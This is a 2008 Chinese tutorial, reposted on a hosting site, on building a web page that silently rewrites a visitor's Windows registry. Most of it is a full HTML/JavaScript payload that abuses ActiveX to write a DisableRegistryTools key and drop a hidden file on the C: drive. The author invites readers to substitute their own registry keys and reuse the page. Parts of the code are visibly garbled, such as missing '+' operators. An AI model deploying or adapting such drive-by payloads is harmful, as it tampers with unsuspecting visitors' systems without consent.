如何利用网页改写注册表

2008-04-09 04:10:40来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折


我们上网时常见到一些:“注册表被某某网站改写”或者“上了某某网站后,开机时会弹出对话框。”等等这一类的现象。其实,都只是一些网站利用简单的HTML编程改写注册表而实现的。那么现在,就让我们来对其作进一步的了解,看这究竟是怎么一回事儿!
不知大家对Windows系统注册表了解有多少?我们知道,在Windows系统下,我们可以编写注册表脚本文件『*.reg』来实现对注册表的改写。先让我们来看一个注册表脚本文件: REGEDIT 4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=DWORD:00000001 不知大家看懂没?以上这个注册表脚本是锁住注册表编辑器。好了,注册表脚本编好了,再让我们看看怎样将其与HTML结合。
以下是一个HTML源码: <HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=JavaScript>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{
try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
sh = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
fo = a1.GetObject();
if (document.cookie.indexOf("km169set") == -1)
{
sh.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", 1,"REG_DWORD");
hd=fo.CreateTextFile();
hd.write();
hd.close();
file=fo.GetFile("c:\\yntop.htm");
file.Attributes=6;
var expdate = new Date((new Date()).getTime() (1));
document.cookie="km169set=km169; expires=" expdate.toGMTString() "; path=/;"
}
}
catch(e)
{
}
} function init()
{
setTimeout("f()", 1000);
}
init();</SCRIPT>
</HEAD>
</HTML> 我们注意到在上面这个HTML源码中,有一行:“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", 1,"REG_DWORD”,拿这一行与上面那个注册表脚本比较一下,我们就可以发现,它们唯一的不同除了连接符不一样,还有书写格式的细小区别。但是这其中的区别不用我说也能够发现。下面我们来仔细看一下这段HTML源码中其他的一些语句。
相信大家都已经看出,这段HTML源码是利用JavaScript来实现对注册表的改写,其中最关键的一句也就是: sh.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", 1,"REG_DWORD"); 这也就是写入注册表的语句:sh.RegWrite。其格式为:“sh.RegWrite("注册表键",键值,"键值类型");”。如果大家要改,只要将括号里的内容改成自己的内容,其他的均可套用,作成一个最简单的网页。
好了,在这篇文章里,我只向大家介绍怎样编写一个简单的能改写注册表的网页,其他关于注册表的内容,我就不在这里详述了。最后毛窝要声明一点:本片文章内容有一定的危险,请大家慎重使用! 关闭本页

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:当菜鸟遇上黒客之二:端口扫描

下一篇:当菜鸟遇上黒客之四:信息窃取